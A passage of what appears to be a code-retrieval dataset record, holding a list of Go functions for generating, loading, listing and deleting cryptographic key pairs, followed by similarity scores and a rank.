kvp_mu.RUnlock()\n\n\tfor _, prev := range ls {\n\n\t\tif prev.Key == key {\n\t\t\treturn Bytex(prev.Value), true\n\t\t}\n\t}\n\n\treturn Bytex(\"\"), false\n}", "func (s stack) DeleteKeyPair(ctx context.Context, id string) fail.Error {\n\treturn fail.NotImplementedError(\"DeleteKeyPair() not implemented yet\") // FIXME: Technical debt\n}", "func (client *Client) ListKeyPairs() ([]model.KeyPair, error) {\n\treturn client.feclt.ListKeyPairs()\n}", "func Keypair(rand io.Reader) (publicKey PublicKey, privateKey PrivateKey, err error) {\n\tpublic, private, err := ed25519.GenerateKey(rand)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn PublicKey(public), PrivateKey(private), nil\n}", "func GenerateKeyPair(h func() hash.Hash, seed []byte) (*PublicKey, *PrivateKey, error) {\n\tif len(seed) != 0 && len(seed) != seedSize {\n\t\treturn nil, nil, errors.New(\"invalid size of seed\")\n\t}\n\n\tokm, err := generateOKM(seed, h)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tprivKeyFr := frFromOKM(okm)\n\n\tprivKey := &PrivateKey{privKeyFr}\n\tpubKey := privKey.PublicKey()\n\n\treturn pubKey, privKey, nil\n}", "func (_m *Keychain) GetStoredKeyPairInLibP2PFormat() (crypto.PrivKey, crypto.PubKey, error) {\n\tret := _m.Called()\n\n\tvar r0 crypto.PrivKey\n\tif rf, ok := ret.Get(0).(func() crypto.PrivKey); ok {\n\t\tr0 = rf()\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(crypto.PrivKey)\n\t\t}\n\t}\n\n\tvar r1 crypto.PubKey\n\tif rf, ok := ret.Get(1).(func() crypto.PubKey); ok {\n\t\tr1 = rf()\n\t} else {\n\t\tif ret.Get(1) != nil {\n\t\t\tr1 = ret.Get(1).(crypto.PubKey)\n\t\t}\n\t}\n\n\tvar r2 error\n\tif rf, ok := ret.Get(2).(func() error); ok {\n\t\tr2 = rf()\n\t} else {\n\t\tr2 = ret.Error(2)\n\t}\n\n\treturn r0, r1, r2\n}", "func (m *KeyValue) GetKey()(*string) {\n return m.key\n}", "func (client *Client) DeleteKeyPair(id string) error {\n\treturn client.osclt.DeleteKeyPair(id)\n}", "func (c *Curve25519) GenerateKeyPair() (KeyPair, error) {\n\n\tvar priv [32]byte\n\n\t// fill private key\n\t_, err := c.randSource.Read(priv[:])\n\tif err != nil {\n\t\treturn KeyPair{}, err\n\t}\n\n\tpriv[0] &= 248\n\tpriv[31] &= 127\n\tpriv[31] |= 64\n\n\tvar pubKey [32]byte\n\tcurve25519.ScalarBaseMult(&pubKey, &priv)\n\n\treturn KeyPair{\n\t\tPrivateKey: priv,\n\t\tPublicKey: pubKey,\n\t}, nil\n\n}", "func GenerateKeyPair(rand io.Reader) (*PublicKey, *PrivateKey, error) {\n\tvar seed [KeySeedSize]byte\n\tif rand == nil {\n\t\trand = cryptoRand.Reader\n\t}\n\t_, err := io.ReadFull(rand, seed[:])\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpk, sk := NewKeyFromSeed(seed[:])\n\treturn pk, sk, nil\n}", "func (k *KeyPair) GetPublicKey() p2pCrypto.PubKey {\n\treturn k.pubKey\n}", "func (s *V3Backend) Get(ctx context.Context, key string) (args.Pair, error) {\n\tresp, err := s.Client.Get(ctx, key)\n\tif err != nil {\n\t\treturn args.Pair{}, err\n\t}\n\tif len(resp.Kvs) == 0 {\n\t\treturn args.Pair{}, errors.New(fmt.Sprintf(\"'%s' not found\", key))\n\t}\n\treturn args.Pair{Key: string(resp.Kvs[0].Key), Value: resp.Kvs[0].Value}, nil\n}", "func (p *KeyPair) String() string {\n\treturn helper.BytesToHex(p.PrivateKey)\n}", "func GenerateKeyPair(h func() hash.Hash, seed []byte) (*PublicKey, *PrivateKey, error) {\n\tif len(seed) != 0 && len(seed) != seedSize {\n\t\treturn nil, nil, errors.New(\"invalid size of seed\")\n\t}\n\n\tokm, err := generateOKM(seed, h)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tprivKeyFr, err := frFromOKM(okm)\n\tif err != nil {\n\t\treturn nil, nil, fmt.Errorf(\"convert OKM to FR: %w\", err)\n\t}\n\n\tprivKey := &PrivateKey{PrivKey: g2pubs.NewSecretKeyFromFR(privKeyFr)}\n\tpubKey := privKey.PublicKey()\n\n\treturn pubKey, privKey, nil\n}", "func GenLamportKeyPair() *Keypair {\n\tkp := Keypair{\n\t\tpublic: [256]*key{},\n\t\tprivate: [256]*key{},\n\t}\n\n\tpub, priv := genKeyPair()\n\tcopy(kp.public[:], pub)\n\tcopy(kp.private[:], priv)\n\treturn &kp\n}", "func ExtractKeyPairs(page pagination.Page) ([]os.KeyPair, error) {\n\treturn os.ExtractKeyPairs(page)\n}", "func GenKeyPair() (string, string, error) {\n\tprivateKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tprivateKeyPEM := &pem.Block{Type: \"RSA PRIVATE KEY\", Bytes: x509.MarshalPKCS1PrivateKey(privateKey)}\n\tvar private bytes.Buffer\n\tif err := pem.Encode(&private, privateKeyPEM); err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\t// generate public key\n\tpub, err := ssh.NewPublicKey(&privateKey.PublicKey)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tpublic := ssh.MarshalAuthorizedKey(pub)\n\treturn string(public), private.String(), nil\n}", "func GenKeyPair() (string, string, error) {\n\tprivateKey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tprivateKeyPEM := &pem.Block{Type: \"RSA PRIVATE KEY\", Bytes: x509.MarshalPKCS1PrivateKey(privateKey)}\n\tvar private bytes.Buffer\n\tif err := pem.Encode(&private, privateKeyPEM); err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\t// generate public key\n\tpub, err := ssh.NewPublicKey(&privateKey.PublicKey)\n\tif err != nil {\n\t\treturn \"\", \"\", err\n\t}\n\n\tpublic := ssh.MarshalAuthorizedKey(pub)\n\treturn string(public), private.String(), nil\n}", "func (_IUniswapV2Factory *IUniswapV2FactoryCallerSession) GetPair(tokenA common.Address, tokenB common.Address) (common.Address, error) {\r\n\treturn _IUniswapV2Factory.Contract.GetPair(&_IUniswapV2Factory.CallOpts, tokenA, tokenB)\r\n}", "func NewPair(p *big.Int, g int64) (*big.Int, *big.Int) {\n\tprivateKey := PrivateKey(p)\n\tpublicKey := PublicKey(privateKey, p, g)\n\treturn privateKey, publicKey\n}", "func (_IUniswapV2Factory *IUniswapV2FactorySession) GetPair(tokenA common.Address, tokenB common.Address) (common.Address, error) {\r\n\treturn _IUniswapV2Factory.Contract.GetPair(&_IUniswapV2Factory.CallOpts, tokenA, tokenB)\r\n}", "func (client *Client) CreateKeyPair(name string) (*model.KeyPair, error) {\n\treturn client.feclt.CreateKeyPair(name)\n}", "func GetKeyPairController(req *server.Request) {\n\treq.Response.Header().Set(\"Content-Type\", \"application/json\")\n\n\tretData := &common.APISSHPair{\n\t\tPrivate: req.APIKey.SSHPrivate,\n\t\tPublic: req.APIKey.SSHPublic,\n\t}\n\n\tenc := json.NewEncoder(req.Response)\n\terr := enc.Encode(retData)\n\tif err != nil {\n\t\treq.App.Log.Error(err.Error())\n\t\thttp.Error(req.Response, err.Error(), 500)\n\t}\n}", "func GetPSK(t *testing.T) *PresharedKey {\n\tt.Helper()\n\n\tk, _ := GeneratePSK()\n\treturn &k\n}", "func (sas serviceAccounts) ForKeyPair(\n\tkeyID, keySecret string,\n) (*models.ServiceAccount, error) {\n\tsa := []*models.ServiceAccount{}\n\tif _, err := sas.storage.PG.DB.Query(\n\t\t&sa, `SELECT id, name, key_id, key_secret, email, base_role_id\n\t\tFROM service_accounts WHERE key_id = ? AND key_secret = ?`,\n\t\tkeyID, keySecret,\n\t); err != nil {\n\t\treturn nil, err\n\t}\n\tif len(sa) == 0 {\n\t\treturn nil, errors.NewEntityNotFoundError(models.ServiceAccount{}, keyID)\n\t}\n\treturn sa[0], nil\n}", "func (s stack) ListKeyPairs(context.Context) ([]*abstract.KeyPair, fail.Error) {\n\treturn nil, fail.NotImplementedError(\"ListKeyPairs() not implemented yet\") // FIXME: Technical debt\n}", "func (f *fileStore) LoadKeyPair(targetScheme *crypto.Scheme) (*Pair, error) {\n\tp := new(Pair)\n\tif targetScheme != nil {\n\t\tp.Public = new(Identity)\n\t\tp.Public.Scheme = targetScheme\n\t}\n\tif err := Load(f.privateKeyFile, p); err != nil {\n\t\treturn nil, err\n\t}\n\treturn p, Load(f.publicKeyFile, p.Public)\n}", "func newKeyPair() (ecdsa.PrivateKey, []byte) {\n\tcurve := elliptic.P256()\n\n\tpriKey, err := ecdsa.GenerateKey(curve, rand.Reader)\n\tif err != nil {\n\t\tlog.Panicln(err)\n\t}\n\tpubKey := append(priKey.PublicKey.X.Bytes(), priKey.PublicKey.Y.Bytes()...)\n\n\treturn *priKey, pubKey\n}", "func NewKeyPair(config CreateKeyPairConfig) (KeyPair, error) {\n\tif config.Type == Default {\n\t\tconfig.Type = Ecdsa\n\t}\n\n\tswitch config.Type {\n\tcase Ecdsa:\n\t\treturn newEcdsaKeyPair(config)\n\tcase Rsa:\n\t\treturn newRsaKeyPair(config)\n\t}\n\n\treturn KeyPair{}, fmt.Errorf(\"Unable to generate new key pair, type %s is not supported\",\n\t\tconfig.Type.String())\n}", "func NewKeypair() (*Keypair, error) {\n\tpub, priv, err := GenerateKeypair()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &Keypair{\n\t\tpriv: *priv,\n\t\tpub: *pub,\n\t}, nil\n}", "func (client *Client) ListKeyPairs() ([]model.KeyPair, error) {\n\treturn client.osclt.ListKeyPairs()\n}", "func (w *Whisper) DeleteKeyPair(key string) bool {\n\tw.keyMu.Lock()\n\tdefer w.keyMu.Unlock()\n\n\tif w.privateKeys[key] != nil {\n\t\tdelete(w.privateKeys, key)\n\t\treturn true\n\t}\n\treturn false\n}", "func GetOrCreateSSHKeyPair(secrets interface {\n\tGet(organizationID uint, secretID string) (*secret.SecretItemResponse, error)\n\tStore(organizationID uint, request *secret.CreateSecretRequest) (string, error)\n}, cluster interface {\n\tGetID() uint\n\tGetName() string\n\tGetOrganizationID() uint\n\tGetSSHSecretID() string\n\tGetUID() string\n},\n) (ssh.KeyPair, string, error) {\n\tsshSecretID := cluster.GetSSHSecretID()\n\tif sshSecretID == \"\" {\n\t\treturn CreateSSHKeyPair(secrets, cluster.GetOrganizationID(), cluster.GetID(), cluster.GetName(), cluster.GetUID())\n\t}\n\tsshKeyPair, err := GetSSHKeyPair(secrets, cluster.GetOrganizationID(), sshSecretID)\n\treturn sshKeyPair, sshSecretID, err\n}", "func (c VpnCredential) GetKey() string {\n\treturn c.Key\n}", "func (o ClusterNodeAttributeOutput) KeyPairName() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeAttribute) string { return v.KeyPairName }).(pulumi.StringOutput)\n}", "func CreateKeyPair() (pubKey PublicKey, secKey SecretKey, err error) {\n\terrorCode := C.crypto_sign_keypair((*C.uchar)(&pubKey[0]), (*C.uchar)(&secKey[0]))\n\tif errorCode != 0 {\n\t\terr = errors.New(\"call to crypto_sign_keypair failed\")\n\t}\n\treturn\n}", "func (o EcsLaunchTemplateOutput) KeyPairName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *EcsLaunchTemplate) pulumi.StringPtrOutput { return v.KeyPairName }).(pulumi.StringPtrOutput)\n}", "func ParseKeyPair(r io.Reader) (*KeyPair, error) {\n\tvar s ssbSecret\n\tif err := json.NewDecoder(r).Decode(&s); err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: JSON decoding failed\")\n\t}\n\n\tpublic, err := base64.StdEncoding.DecodeString(strings.TrimSuffix(s.Public, \".ed25519\"))\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: base64 decode of public part failed\")\n\t}\n\n\tprivate, err := base64.StdEncoding.DecodeString(strings.TrimSuffix(s.Private, \".ed25519\"))\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.Parse: base64 decode of private part failed\")\n\t}\n\n\tvar kp secrethandshake.EdKeyPair\n\tcopy(kp.Public[:], public)\n\tcopy(kp.Secret[:], private)\n\n\tssbkp := KeyPair{\n\t\tId: s.ID,\n\t\tPair: kp,\n\t}\n\treturn &ssbkp, nil\n}", "func (c *Client) GetPairs() error {\n\tu := url.URL{Scheme: \"https\", Host: \"api.kraken.com\", Path: \"/0/public/AssetPairs\"}\n\tres, err := http.Get(u.String())\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer res.Body.Close()\n\tbody, err := ioutil.ReadAll(res.Body)\n\n\tvar pairsResponse assetPairResponse\n\terr = json.Unmarshal(body, &pairsResponse)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar pairs []string\n\tfor key := range pairsResponse.Result {\n\t\tif pairsResponse.Result[key].Pair != \"\" {\n\t\t\tpairs = append(pairs, pairsResponse.Result[key].Pair)\n\t\t}\n\t}\n\t// c.Pairs = pairs\n\tc.Pairs = []string{\"XBT/USD\", \"XBT/CAD\", \"ETH/USD\", \"ETH/CAD\", \"XRP/USD\", \"XRP/CAD\"}\n\treturn nil\n}", "func (_SushiV2Factory *SushiV2FactorySession) GetPair(arg0 common.Address, arg1 common.Address) (common.Address, error) {\n\treturn _SushiV2Factory.Contract.GetPair(&_SushiV2Factory.CallOpts, arg0, arg1)\n}", "func (v *PublicParamsManager) NewCertifierKeyPair() ([]byte, []byte, error) {\n\tpanic(\"NewCertifierKeyPair cannot be called from fabtoken\")\n}", "func newKeyPair() (ecdsa.PrivateKey, []byte) {\n\t// ECC generate private key\n\tcurve := elliptic.P256()\n\tprivate, err := ecdsa.GenerateKey(curve, rand.Reader)\n\tlog.Println(\"--------\", private)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t}\n\t// private key generate public key\n\tpubKey := append(private.PublicKey.X.Bytes(), private.PublicKey.Y.Bytes()...)\n\treturn *private, pubKey\n}", "func (_SushiV2Factory *SushiV2FactoryCallerSession) GetPair(arg0 common.Address, arg1 common.Address) (common.Address, error) {\n\treturn _SushiV2Factory.Contract.GetPair(&_SushiV2Factory.CallOpts, arg0, arg1)\n}", "func (client *Client) CreateKeyPair(name string) (*model.KeyPair, error) {\n\treturn client.osclt.CreateKeyPair(name)\n}", "func (v *KeyValue_SetValueV2_Args) GetKey() (o Key) {\n\tif v != nil {\n\t\to = v.Key\n\t}\n\treturn\n}" ]
[ "0.75120753", "0.74316525", "0.69698906", "0.6735079", "0.6679419", "0.6659267", "0.65252054", "0.64874285", "0.6468373", "0.6437245", "0.64149314", "0.6394708", "0.6146873", "0.6131079", "0.6117827", "0.6115615", "0.6075201", "0.6060732", "0.6035501", "0.60176426", "0.5968178", "0.5963591", "0.5956374", "0.59187925", "0.5917879", "0.5892177", "0.588309", "0.584286", "0.58399665", "0.58362967", "0.5806008", "0.57891846", "0.5785592", "0.5737444", "0.57369685", "0.5731865", "0.5717478", "0.5700896", "0.5687232", "0.5657224", "0.5655431", "0.56439024", "0.5639298", "0.56346345", "0.5599277", "0.5598984", "0.55978656", "0.5583471", "0.5566603", "0.55652434", "0.55280906", "0.5526194", "0.55215466", "0.55214286", "0.5485658", "0.54500866", "0.5440168", "0.5424167", "0.5423986", "0.54118603", "0.54107696", "0.53993636", "0.53985447", "0.5335319", "0.5330439", "0.53151315", "0.5313456", "0.53094184", "0.5295806", "0.5288973", "0.5287903", "0.5284205", "0.5284205", "0.5280539", "0.5278352", "0.5274471", "0.5267402", "0.526477", "0.524333", "0.52345693", "0.5223243", "0.52121705", "0.5211647", "0.5208432", "0.52078867", "0.5206991", "0.519506", "0.5183685", "0.51818186", "0.5174588", "0.51682097", "0.516259", "0.51595795", "0.51571935", "0.5154079", "0.51493835", "0.5146495", "0.51446784", "0.51409435", "0.5138559" ]
0.75254697
0
GetKeyPairOk returns a tuple with the KeyPair field value if set, nil otherwise and a boolean to check if the value has been set.
func (o *CloudAwsVirtualMachineAllOf) GetKeyPairOk() (*CloudAwsKeyPairRelationship, bool) { if o == nil || o.KeyPair == nil { return nil, false } return o.KeyPair, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *PipelineSshKeyPairAllOf) GetPrivateKeyOk() (*string, bool) {\n\tif o == nil || o.PrivateKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.PrivateKey, true\n}", "func (o *CloudAwsVirtualMachineAllOf) HasKeyPair() bool {\n\tif o != nil && o.KeyPair != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (w *Whisper) HasKeyPair(id string) bool {\n\tw.keyMu.RLock()\n\tdefer w.keyMu.RUnlock()\n\treturn w.privateKeys[id] != nil\n}", "func (o *TppCredentialsParams) GetTppApiKeyOk() (*string, bool) {\n\tif o == nil || o.TppApiKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TppApiKey, true\n}", "func (o *PipelineSshKeyPairAllOf) GetPublicKeyOk() (*string, bool) {\n\tif o == nil || o.PublicKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.PublicKey, true\n}", "func (o *TppCertificateParams) GetPrivateKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.PrivateKey, true\n}", "func isValidKeyPair(param []string) bool {\n\treturn len(param) == 2\n}", "func (o *CloudAwsVirtualMachineAllOf) GetKeyPair() CloudAwsKeyPairRelationship {\n\tif o == nil || o.KeyPair == nil {\n\t\tvar ret CloudAwsKeyPairRelationship\n\t\treturn ret\n\t}\n\treturn *o.KeyPair\n}", "func (o *DeployKey) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (o *FiltersVmGroup) GetTagKeysOk() (*[]string, bool) {\n\tif o == nil || o.TagKeys == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TagKeys, true\n}", "func (o *ApiKey) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (o *LabelProperties) GetKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\n\treturn o.Key, true\n}", "func (o *FiltersSecurityGroup) GetTagKeysOk() (*[]string, bool) {\n\tif o == nil || o.TagKeys == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TagKeys, true\n}", "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.feclt.GetKeyPair(id)\n}", "func (o *FiltersNet) GetTagKeysOk() ([]string, bool) {\n\tif o == nil || o.TagKeys == nil {\n\t\tvar ret []string\n\t\treturn ret, false\n\t}\n\treturn *o.TagKeys, true\n}", "func NewGetKeyPairsOK() *GetKeyPairsOK {\n\treturn &GetKeyPairsOK{}\n}", "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.osclt.GetKeyPair(id)\n}", "func (o *DnsViewparamDataData) GetViewparamKeyOk() (*string, bool) {\n\tif o == nil || o.ViewparamKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ViewparamKey, true\n}", "func (k *KeyPair) IsValid() bool {\n\treturn k.Cert != nil && k.Key != nil\n}", "func (o *ChartDataPoint) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (o *FiltersNatService) GetTagKeysOk() ([]string, bool) {\n\tif o == nil || o.TagKeys == nil {\n\t\tvar ret []string\n\t\treturn ret, false\n\t}\n\treturn *o.TagKeys, true\n}", "func (o *TppCertificateParams) GetPassphraseOk() (*string, bool) {\n\tif o == nil || o.Passphrase == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Passphrase, true\n}", "func (o *CustomHostMetadataKey) GetKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Key, true\n}", "func (o *FiltersVirtualGateway) GetTagKeysOk() ([]string, bool) {\n\tif o == nil || o.TagKeys == nil {\n\t\tvar ret []string\n\t\treturn ret, false\n\t}\n\treturn *o.TagKeys, true\n}", "func (o *VulnUpdateNotification) GetRecordStateKeyOk() (*string, bool) {\n\tif o == nil || o.RecordStateKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.RecordStateKey, true\n}", "func (o *Commitstatus) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (o *SearchTagItem) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (o *TppCertificateParams) GetPublicKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.PublicKey, true\n}", "func (e JsonToMetadata_KeyValuePairValidationError) Key() bool { return e.key }", "func (o *ModelsAzureCredentials) GetAccountKeyOk() (*string, bool) {\n\tif o == nil || o.AccountKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AccountKey, true\n}", "func (o *PagerDutyServiceKey) GetServiceKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ServiceKey, true\n}", "func (_m *TranslationKeyStore) GetPoisonKeyPair() (*keys.Keypair, error) {\n\tret := _m.Called()\n\n\tvar r0 *keys.Keypair\n\tif rf, ok := ret.Get(0).(func() *keys.Keypair); ok {\n\t\tr0 = rf()\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*keys.Keypair)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func() error); ok {\n\t\tr1 = rf()\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (v *OrderedValues) GetOk(key []byte) ([]byte, bool) {\n\tfor _, j := range *v {\n\t\tif len(j) > 0 && bytes.Equal(j[0], key) {\n\t\t\tif len(j) > 1 {\n\t\t\t\treturn j[1], true\n\t\t\t}\n\t\t\treturn nil, true\n\t\t}\n\t}\n\treturn nil, false\n}", "func (o *ResourceDefinitionFilter) GetKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Key, true\n}", "func (o *LongProperty) GetKeyOk() (*string, bool) {\n\tif o == nil || o.Key == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Key, true\n}", "func (e *Cryptopia) GetPair(key string) *pair.Pair {\n\treturn nil\n}", "func (o *NotificationConfig) GetProjectKeyOk() (*string, bool) {\n\tif o == nil || o.ProjectKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ProjectKey, true\n}", "func (o *NotificationConfig) GetApplicationKeyOk() (*string, bool) {\n\tif o == nil || o.ApplicationKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ApplicationKey, true\n}", "func (o InstanceOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Instance) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func (o *NormalizedProjectRevisionHook) GetConfigKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ConfigKey, true\n}", "func (o *ProjectApiKey) GetValueOk() (*string, bool) {\n\tif o == nil || o.Value == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Value, true\n}", "func (p *Pair) IsValid() bool {\n\treturn p.KeyIsValid() && p.ValueIsValid()\n}", "func (o *StorageRemoteKeySetting) GetIsPasswordSetOk() (*bool, bool) {\n\tif o == nil || o.IsPasswordSet == nil {\n\t\treturn nil, false\n\t}\n\treturn o.IsPasswordSet, true\n}", "func (o *EnvironmentVariablePair1) GetValueOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Value, true\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) GetProtectionInfoOk() (*HyperflexProtectionInfo, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ProtectionInfo.Get(), o.ProtectionInfo.IsSet()\n}", "func (o *ModelsAWSDetails) GetSecretKeyOk() (*string, bool) {\n\tif o == nil || o.SecretKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecretKey, true\n}", "func (o *DKSharesInfo) GetPublicKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.PublicKey, true\n}", "func (o *V0037JobProperties) GetWckeyOk() (*string, bool) {\n\tif o == nil || o.Wckey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Wckey, true\n}", "func (c *EC2) WaitUntilKeyPairExists(input *DescribeKeyPairsInput) error {\n\treturn c.WaitUntilKeyPairExistsWithContext(aws.BackgroundContext(), input)\n}", "func KeyPair() (*[PUBLICKEYBYTES]byte, *[SECRETKEYBYTES]byte) {\n\tpublicKey := [PUBLICKEYBYTES]byte{}\n\tprivateKey := [SECRETKEYBYTES]byte{}\n\tpublicKeyPtr := (*C.uchar)(unsafe.Pointer(&publicKey))\n\tprivateKeyPtr := (*C.uchar)(unsafe.Pointer(&privateKey))\n\tC.crypto_vrf_keypair(publicKeyPtr, privateKeyPtr)\n\treturn &publicKey, &privateKey\n}", "func (w *Whisper) DeleteKeyPair(key string) bool {\n\tw.keyMu.Lock()\n\tdefer w.keyMu.Unlock()\n\n\tif w.privateKeys[key] != nil {\n\t\tdelete(w.privateKeys, key)\n\t\treturn true\n\t}\n\treturn false\n}", "func (o *ConfluentAccountCreateRequestAttributes) GetApiKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ApiKey, true\n}", "func KeyPair() (publicKey, privateKey []byte, err error) {\n\treturn defaultPH.KeyPair()\n}", "func (o *MicrosoftGraphWorkbookSortField) GetKeyOk() (int32, bool) {\n\tif o == nil || o.Key == nil {\n\t\tvar ret int32\n\t\treturn ret, false\n\t}\n\treturn *o.Key, true\n}", "func (o *AmazonAccountAccessKeys) GetAccessKeyOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.AccessKey, true\n}", "func (o *DeliveryS3Authentication) GetSecretKeyOk() (*string, bool) {\n\tif o == nil || o.SecretKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecretKey, true\n}", "func (tv *TV) DisplayPairingKey() bool {\n\tcommandBody := `<!--?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?--><auth><type>AuthKeyReq</type></auth>`\n\n\ttype Result struct {\n\t\tXMLName xml.Name `xml:\"envelope\"`\n\t\tSuccess string `xml:\"ROAPErrorDetail\"`\n\t}\n\n\tv := Result{}\n\n\tresp, xmlerror := tv.SendXML(commandBody, \"/auth\")\n\n\tif xmlerror != nil {\n\t\treturn false\n\t}\n\n\tbody, readerr := ioutil.ReadAll(resp.Body)\n\tif readerr == nil {\n\t\txml.Unmarshal(body, &v)\n\t}\n\n\treturn resp.StatusCode == 200 && v.Success == \"OK\"\n}", "func verifyKeyPair(chain *security.ChainOfTrust) error {\n\treturn walkChain(chain, func(c *security.ChainOfTrust) error {\n\t\t_, err := tls.LoadX509KeyPair(c.Filename, c.KeyFilename)\n\t\treturn err\n\t})\n}", "func (o *StorageRemoteKeySetting) GetPasswordOk() (*string, bool) {\n\tif o == nil || o.Password == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Password, true\n}", "func GetKeyPair(version *avatar.Version) (avatar.KeyPair, error) {\n\t// zero out the Revision field since it is irrelevant to client keys:\n\tv := avatar.Version{version.Major, version.Minor, version.Patch, 0}\n\n\tif pair, ok := keys[v]; ok {\n\t\treturn pair, nil\n\t}\n\n\treturn *emptyPair, errors.New(\"unsupported version\")\n}", "func (e ClusterPairTargetValidationError) Key() bool { return e.key }", "func TestingKeyPair() *CertInfo {\n\tkeypair, err := tls.X509KeyPair(testCertPEMBlock, testKeyPEMBlock)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"invalid X509 keypair material: %v\", err))\n\t}\n\n\tcert := &CertInfo{\n\t\tkeypair: keypair,\n\t}\n\n\treturn cert\n}", "func (p *Provider) GetKeyPair() (_ tls.Certificate, err error) {\n\tif p.key == nil {\n\t\treturn tls.Certificate{}, ErrKeyRequired\n\t}\n\n\tvar block []byte\n\tvar certs bytes.Buffer\n\tfor i, asn1Data := range p.chain.Certificate {\n\t\tvar crt *x509.Certificate\n\t\tif crt, err = x509.ParseCertificate(asn1Data); err != nil {\n\t\t\treturn tls.Certificate{}, fmt.Errorf(\"could not parse certificate %d: %s\", i, err)\n\t\t}\n\n\t\tif block, err = PEMEncodeCertificate(crt); err != nil {\n\t\t\treturn tls.Certificate{}, fmt.Errorf(\"could not encode certificate %d: %s\", i, err)\n\t\t}\n\n\t\tcerts.Write(block)\n\t}\n\n\tvar key []byte\n\tif key, err = PEMEncodePrivateKey(p.key); err != nil {\n\t\treturn tls.Certificate{}, err\n\t}\n\n\treturn tls.X509KeyPair(certs.Bytes(), key)\n}", "func (o *LaunchpadClicks) GetKeywordOk() (*string, bool) {\n\tif o == nil || o.Keyword == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Keyword, true\n}", "func (o *NotificationConfig) GetApiKeyOk() (*string, bool) {\n\tif o == nil || o.ApiKey == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ApiKey, true\n}", "func (s stack) InspectKeyPair(ctx context.Context, id string) (*abstract.KeyPair, fail.Error) {\n\treturn nil, 